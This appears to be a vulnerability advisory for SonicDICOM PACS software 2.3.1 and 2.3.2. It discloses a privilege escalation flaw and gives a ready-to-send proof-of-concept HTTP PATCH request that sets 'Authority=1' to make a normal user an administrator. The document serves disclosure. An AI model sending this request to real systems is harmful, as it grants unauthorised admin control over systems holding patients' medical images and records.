### Summary
SonicDICOM is PACS software that combines the capabilities of DICOM Server with web browser based DICOM Viewer.
### Description
The application suffers from a privilege escalation vulnerability. Normal user can elevate his/her privileges by sending a HTTP PATCH request seting the parameter 'Authority' to integer value '1' gaining admin rights.
### Vendor
JIUN Corporation - https://www.sonicdicom.com
### Affected Version
2.3.2 and 2.3.1
### Tested On
Microsoft-HTTPAPI/2.0
### PoC
```
PATCH /viewer/api/accounts/update HTTP/1.1
Host: 172.19.0.214
Content-Length: 37
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Escalation Browser/1.0
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: {REMOVED_FOR_BREVITY}
Connection: close
Id=testingus&Name=peend&Authority=1
```
Unavailable Comments